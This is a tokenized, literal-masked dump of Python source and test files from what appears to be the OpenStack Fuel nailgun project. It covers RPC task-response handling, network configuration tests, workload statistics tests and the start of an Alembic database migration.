get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True ) <EOL> failed_response_nodes = { <EOL> n [ '<STR_LIT>' ] : n for n in response if n [ '<STR_LIT:status>' ] != <NUM_LIT:0> <EOL> } <EOL> failed_nodes = [ ] <EOL> failed_repos = set ( ) <EOL> master = failed_response_nodes . pop ( consts . MASTER_NODE_UID , None ) <EOL> if master is not None : <EOL> failed_repos . update ( cls . _get_failed_repos ( master ) ) <EOL> failed_nodes . append ( consts . MASTER_NODE_NAME ) <EOL> nodes = objects . NodeCollection . filter_by_list ( <EOL> None , '<STR_LIT:id>' , failed_response_nodes , order_by = '<STR_LIT:id>' ) <EOL> for node in nodes : <EOL> failed_repos . update ( cls . _get_failed_repos ( <EOL> failed_response_nodes [ node . uid ] ) ) <EOL> failed_nodes . append ( node . name ) <EOL> err_msg = '<STR_LIT>' <EOL> failed_repos_msg = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if failed_nodes : <EOL> err_msg = failed_nodes_msg . format ( '<STR_LIT:U+002CU+0020>' . join ( failed_nodes ) ) <EOL> if failed_repos : <EOL> err_msg += failed_repos_msg . format ( '<STR_LIT:U+002CU+0020>' . join ( failed_repos ) ) <EOL> if err_msg and suggestion_msg : <EOL> err_msg += suggestion_msg <EOL> if err_msg : <EOL> status = consts . TASK_STATUSES . error <EOL> objects . Task . update_verify_networks ( <EOL> task , status , progress , err_msg , { } ) <EOL> @ classmethod <EOL> def check_repositories_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> failed_nodes_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> cls . _check_repos_connectivity ( kwargs , failed_nodes_msg ) <EOL> @ classmethod <EOL> def check_repositories_with_setup_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . 
dumps ( kwargs ) <EOL> ) <EOL> failed_nodes_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> suggestion_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> cls . _check_repos_connectivity ( kwargs , failed_nodes_msg , <EOL> suggestion_msg ) <EOL> @ classmethod <EOL> def task_in_orchestrator ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> try : <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True , <EOL> lock_for_update = True ) <EOL> if task . status == consts . TASK_STATUSES . pending : <EOL> objects . Task . update ( <EOL> task , { '<STR_LIT:status>' : consts . TASK_STATUSES . running } ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> task_uuid ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , task_uuid , <EOL> task . status ) <EOL> except nailgun_errors . ObjectNotFound : <EOL> logger . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" , task_uuid ) <EOL> @ classmethod <EOL> def update_dnsmasq_resp ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' , '<STR_LIT>' ) <EOL> message = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True , lock_for_update = True ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : message } <EOL> if status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , <EOL> task . name , task . id , error ) <EOL> data [ '<STR_LIT:message>' ] = error <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , [ ] ) </s>
<s> from mock import patch <EOL> from oslo_serialization import jsonutils <EOL> import yaml <EOL> from nailgun . objects import Cluster <EOL> from nailgun . extensions . network_manager . objects . serializers . network_configuration import NeutronNetworkConfigurationSerializer <EOL> from nailgun . extensions . network_manager . objects . serializers . network_configuration import NovaNetworkConfigurationSerializer <EOL> from nailgun import consts <EOL> from nailgun . db . sqlalchemy . models import NeutronConfig <EOL> from nailgun . db . sqlalchemy . models import NovaNetworkConfig <EOL> from nailgun . test . base import BaseIntegrationTest <EOL> from nailgun . utils import reverse <EOL> class TestNetworkModels ( BaseIntegrationTest ) : <EOL> network_config = { <EOL> "<STR_LIT>" : consts . NEUTRON_L23_PROVIDERS . ovs , <EOL> "<STR_LIT>" : consts . NEUTRON_SEGMENT_TYPES . gre , <EOL> "<STR_LIT>" : [ <NUM_LIT:1000> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:2> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : { } <EOL> } <EOL> def create_env_using_statuses ( self , cluster_status , node_status ) : <EOL> cluster = self . env . create ( <EOL> cluster_kwargs = { <EOL> '<STR_LIT>' : consts . CLUSTER_NET_PROVIDERS . neutron , <EOL> '<STR_LIT>' : consts . NEUTRON_SEGMENT_TYPES . gre , <EOL> '<STR_LIT:status>' : cluster_status <EOL> } , <EOL> nodes_kwargs = [ <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } , <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } , <EOL> { '<STR_LIT>' : False , '<STR_LIT:status>' : node_status } ] ) <EOL> return cluster <EOL> def test_cluster_locking_during_deployment ( self ) : <EOL> cluster = self . 
create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . deployment , <EOL> consts . NODE_STATUSES . deploying ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> resp_nova_net = self . env . nova_networks_put ( <EOL> cluster . id , <EOL> test_nets , <EOL> expect_errors = True ) <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , <EOL> test_nets , <EOL> expect_errors = True ) <EOL> resp_cluster = self . app . put ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : cluster . id } ) , <EOL> jsonutils . dumps ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT:foo>" : { "<STR_LIT:bar>" : None } <EOL> } <EOL> } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True ) <EOL> resp_cluster_get = self . app . get ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : cluster . id } ) , <EOL> headers = self . default_headers ) <EOL> self . assertTrue ( resp_cluster_get . json_body [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( resp_nova_net . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp_neutron_net . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp_cluster . status_code , <NUM_LIT> ) <EOL> def test_networks_update_after_deployment ( self ) : <EOL> cluster = self . create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . operational , <EOL> consts . NODE_STATUSES . ready ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> test_nets [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> test_network_name = consts . NETWORKS . management <EOL> mgmt_net = filter ( lambda x : x [ '<STR_LIT:name>' ] == test_network_name , <EOL> test_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> mgmt_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets , expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp_neutron_net . 
status_code ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( test_network_name , mgmt_net [ '<STR_LIT:id>' ] ) , <EOL> resp_neutron_net . json_body [ '<STR_LIT:message>' ] ) <EOL> mgmt_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> resp_neutron_net = self . env . neutron_networks_put ( cluster . id , test_nets ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp_neutron_net . status_code ) <EOL> new_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> modified_net = filter ( lambda x : x [ '<STR_LIT:name>' ] == test_network_name , <EOL> new_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( u'<STR_LIT>' , modified_net [ '<STR_LIT>' ] ) <EOL> self . assertDictEqual ( test_nets [ '<STR_LIT>' ] , <EOL> new_nets [ '<STR_LIT>' ] ) <EOL> def test_admin_network_update_after_deployment ( self ) : <EOL> cluster = self . create_env_using_statuses ( <EOL> consts . CLUSTER_STATUSES . operational , <EOL> consts . NODE_STATUSES . ready ) <EOL> test_nets = self . env . neutron_networks_get ( cluster . id ) . json_body <EOL> admin_net = filter ( <EOL> lambda x : x [ '<STR_LIT:name>' ] == consts . NETWORKS . fuelweb_admin , <EOL> test_nets [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> admin_net [ '<STR_LIT>' ] = u'<STR_LIT>' <EOL> admin_net [ '<STR_LIT>' ] = [ [ u'<STR_LIT>' , u'<STR_LIT>' ] ] <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets , expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp_neutron_net . status_code ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( admin_net [ '<STR_LIT:name>' ] , admin_net [ '<STR_LIT:id>' ] ) , <EOL> resp_neutron_net . json_body [ '<STR_LIT:message>' ] ) <EOL> for node in self . env . nodes : <EOL> self . db . delete ( node ) <EOL> self . db . commit ( ) <EOL> with patch ( '<STR_LIT>' ) : <EOL> resp_neutron_net = self . env . neutron_networks_put ( <EOL> cluster . id , test_nets ) <EOL> self . 
assertEqual ( <NUM_LIT:200> , resp_neutron_net . status_code ) <EOL> def test_nova_net_networking_parameters ( self ) : <EOL> cluster = self . env . create_cluster ( api = False ) <EOL> self . db . delete ( cluster . network_config ) <EOL> kw = { <EOL> "<STR_LIT>" : consts . NOVA_NET_MANAGERS . VlanManager , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:16> , <EOL> "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : cluster . id <EOL> } <EOL> nc = NovaNetworkConfig ( ** kw ) <EOL> self . db . add ( nc ) <EOL> self . db . flush ( ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NovaNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> kw . pop ( "<STR_LIT>" ) <EOL> self . assertEqual ( nw_params , kw ) <EOL> def check_neutron_networking_parameters ( self , floating_ranges ) : <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> self . db . delete ( cluster . network_config ) <EOL> self . network_config [ '<STR_LIT>' ] = floating_ranges <EOL> self . network_config [ '<STR_LIT>' ] = cluster . id <EOL> nc = NeutronConfig ( ** self . network_config ) <EOL> self . db . add ( nc ) <EOL> self . db . flush ( ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . network_config . pop ( "<STR_LIT>" ) <EOL> self . assertItemsEqual ( nw_params , self . network_config ) <EOL> def test_neutron_networking_parameters_w_single_floating_ranges ( self ) : <EOL> floating_ranges = [ [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> self . 
check_neutron_networking_parameters ( floating_ranges ) <EOL> def test_neutron_networking_parameters_w_multiple_floating_ranges ( self ) : <EOL> floating_ranges = [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> self . check_neutron_networking_parameters ( floating_ranges ) <EOL> def test_neutron_has_internal_and_floating_names ( self ) : <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , cluster . network_config . internal_name ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , cluster . network_config . floating_name ) <EOL> def test_neutron_networking_parameters_baremetal ( self ) : <EOL> attributes_metadata = """<STR_LIT>""" <EOL> cluster = self . env . create_cluster ( <EOL> api = False , <EOL> net_provider = consts . CLUSTER_NET_PROVIDERS . neutron ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . assertNotIn ( '<STR_LIT>' , nw_params ) <EOL> self . assertNotIn ( '<STR_LIT>' , nw_params ) <EOL> Cluster . patch_attributes ( <EOL> cluster , yaml . load ( attributes_metadata % True ) ) <EOL> self . db . refresh ( cluster ) <EOL> nw_params = NeutronNetworkConfigurationSerializer . serialize_network_params ( cluster ) <EOL> self . assertIn ( '<STR_LIT>' , nw_params ) <EOL> self . assertIn ( '<STR_LIT>' , nw_params ) </s>
<s> from oslo_serialization import jsonutils <EOL> from nailgun . test . base import BaseIntegrationTest <EOL> from nailgun . utils import reverse <EOL> class TestReleaseNetworksHandlers ( BaseIntegrationTest ) : <EOL> def setUp ( self ) : <EOL> super ( TestReleaseNetworksHandlers , self ) . setUp ( ) <EOL> self . release = self . env . create_release ( ) <EOL> def test_get ( self ) : <EOL> resp = self . app . get ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . release [ '<STR_LIT>' ] , resp . json ) <EOL> def test_post ( self ) : <EOL> resp = self . app . post ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_delete ( self ) : <EOL> resp = self . app . delete ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> headers = self . default_headers , <EOL> expect_errors = True <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_put ( self ) : <EOL> data = jsonutils . dumps ( self . release [ '<STR_LIT>' ] ) <EOL> resp = self . app . put ( <EOL> reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . release . id } ) , <EOL> data , <EOL> headers = self . default_headers <EOL> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) </s>
<s> import datetime <EOL> from nailgun . test . base import BaseTestCase <EOL> from nailgun import consts <EOL> from nailgun . objects import OpenStackWorkloadStats <EOL> from nailgun . objects import OpenStackWorkloadStatsCollection <EOL> from nailgun . settings import settings <EOL> class TestOSWLObject ( BaseTestCase ) : <EOL> def test_oswl_get_last_by_cluster_id_resource_type ( self ) : <EOL> cluster_id = <NUM_LIT:1> <EOL> dt = datetime . datetime . utcnow ( ) <EOL> obj_data = { <EOL> '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT>' : consts . OSWL_RESOURCE_TYPES . vm , <EOL> '<STR_LIT>' : dt . date ( ) , <EOL> '<STR_LIT>' : dt . time ( ) , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> obj = OpenStackWorkloadStats . create ( obj_data ) <EOL> self . assertEqual ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . vm ) , <EOL> obj <EOL> ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> <NUM_LIT:0> , consts . OSWL_RESOURCE_TYPES . vm ) <EOL> ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . tenant ) <EOL> ) <EOL> OpenStackWorkloadStats . delete ( obj ) <EOL> self . assertIsNone ( <EOL> OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , consts . OSWL_RESOURCE_TYPES . vm ) <EOL> ) <EOL> def test_clean_expired_entries ( self ) : <EOL> dt_now = datetime . datetime . utcnow ( ) <EOL> t_delta = datetime . timedelta ( days = settings . OSWL_STORING_PERIOD ) <EOL> entries_to_del_cluster_ids = ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> for cluster_id in entries_to_del_cluster_ids : <EOL> obj_kwargs = { <EOL> "<STR_LIT>" : cluster_id , <EOL> "<STR_LIT>" : consts . OSWL_RESOURCE_TYPES . volume , <EOL> "<STR_LIT>" : dt_now . time ( ) , <EOL> "<STR_LIT>" : dt_now . date ( ) - t_delta , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> OpenStackWorkloadStats . 
create ( obj_kwargs ) <EOL> untouched_obj_kwargs = { <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : consts . OSWL_RESOURCE_TYPES . vm , <EOL> "<STR_LIT>" : dt_now . time ( ) , <EOL> "<STR_LIT>" : dt_now . date ( ) , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> OpenStackWorkloadStats . create ( untouched_obj_kwargs ) <EOL> OpenStackWorkloadStatsCollection . clean_expired_entries ( ) <EOL> self . db . commit ( ) <EOL> for cluster_id in entries_to_del_cluster_ids : <EOL> instance = OpenStackWorkloadStats . get_last_by ( <EOL> cluster_id , <EOL> consts . OSWL_RESOURCE_TYPES . volume <EOL> ) <EOL> self . assertIsNone ( instance ) <EOL> untouched_obj = OpenStackWorkloadStats . get_last_by ( <EOL> untouched_obj_kwargs [ "<STR_LIT>" ] , <EOL> consts . OSWL_RESOURCE_TYPES . vm <EOL> ) <EOL> self . assertIsNotNone ( untouched_obj ) <EOL> def test_version_info_serialized ( self ) : <EOL> version_info = { '<STR_LIT>' : '<STR_LIT>' } <EOL> dt = datetime . datetime . utcnow ( ) <EOL> obj = OpenStackWorkloadStats . create ( <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : consts . OSWL_RESOURCE_TYPES . vm , <EOL> '<STR_LIT>' : dt . date ( ) , <EOL> '<STR_LIT>' : dt . time ( ) , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : version_info <EOL> } <EOL> ) <EOL> self . assertEqual ( <EOL> version_info , <EOL> OpenStackWorkloadStats . to_dict ( obj ) [ '<STR_LIT>' ] <EOL> ) </s>
<s> from nailgun . db . sqlalchemy . models import Cluster <EOL> from nailgun . orchestrator . provisioning_serializers import ProvisioningSerializer <EOL> from nailgun . test import base <EOL> class TestFaultTolerance ( base . BaseTestCase ) : <EOL> def test_generating_fault_tolerance_data ( self ) : <EOL> cluster = self . env . create ( <EOL> nodes_kwargs = [ <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> cluster_db = self . db . query ( Cluster ) . get ( cluster [ '<STR_LIT:id>' ] ) <EOL> uids = [ node . uid for node in cluster_db . nodes <EOL> if '<STR_LIT>' in node . roles ] <EOL> correct_res = [ { '<STR_LIT>' : uids , '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> res = ProvisioningSerializer . fault_tolerance ( cluster_db , <EOL> cluster_db . nodes ) <EOL> self . assertEqual ( res , correct_res ) </s>
<s> import netaddr <EOL> from nailgun . extensions . network_manager import utils <EOL> from nailgun . test . base import BaseUnitTest <EOL> class TestNetworkUtils ( BaseUnitTest ) : <EOL> def test_compare_two_macs ( self ) : <EOL> equal_macs = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , netaddr . EUI ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> for mac1 , mac2 in equal_macs : <EOL> self . assertTrue ( utils . is_same_mac ( mac1 , mac2 ) ) <EOL> self . assertFalse ( <EOL> utils . is_same_mac ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_compare_macs_raise_exception ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> utils . is_same_mac ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import mock <EOL> from nailgun import errors <EOL> from nailgun . rpc import receiverd <EOL> from nailgun . test import base <EOL> class TestRpcAcknowledge ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestRpcAcknowledge , self ) . setUp ( ) <EOL> self . receiver = mock . Mock ( ) <EOL> self . connection = mock . Mock ( ) <EOL> self . consumer = receiverd . RPCConsumer ( self . connection , self . receiver ) <EOL> self . msg = mock . Mock ( ) <EOL> self . body = { '<STR_LIT>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:args>' : { } } <EOL> def test_message_acked_if_success ( self ) : <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> def test_message_acked_if_no_task_found ( self ) : <EOL> self . receiver . test . side_effect = errors . CannotFindTask <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> def test_message_acked_if_exception ( self ) : <EOL> self . receiver . test . side_effect = Exception <EOL> self . consumer . consume_msg ( self . body , self . msg ) <EOL> self . assertEqual ( self . receiver . test . call_count , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . msg . ack . call_count , <NUM_LIT:1> ) <EOL> def test_message_requeued_in_case_of_interrupt ( self ) : <EOL> self . receiver . test . side_effect = KeyboardInterrupt <EOL> self . assertRaises ( <EOL> KeyboardInterrupt , <EOL> self . consumer . consume_msg , self . body , self . msg ) <EOL> self . assertFalse ( self . msg . ack . called ) <EOL> self . assertEqual ( self . msg . requeue . call_count , <NUM_LIT:1> ) </s>
<s> try : <EOL> import uwsgidecorators <EOL> except ImportError : <EOL> uwsgidecorators = None <EOL> from nailgun . logger import logger <EOL> def call_task_manager_async ( klass , func , cluster_id , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if uwsgidecorators : <EOL> logger . debug ( '<STR_LIT>' , klass . __name__ , func ) <EOL> instance = klass ( cluster_id = cluster_id ) <EOL> getattr ( instance , func ) ( * args , ** kwargs ) <EOL> if uwsgidecorators : <EOL> logger . debug ( '<STR_LIT>' , klass . __name__ , func ) <EOL> if uwsgidecorators : <EOL> call_task_manager_async = uwsgidecorators . mulefunc ( call_task_manager_async ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = None <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . Text ( ) , nullable = False ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:name>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:status>' , sa . String ( length = <NUM_LIT:8> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . 
Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:id>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = True ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:status>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . 
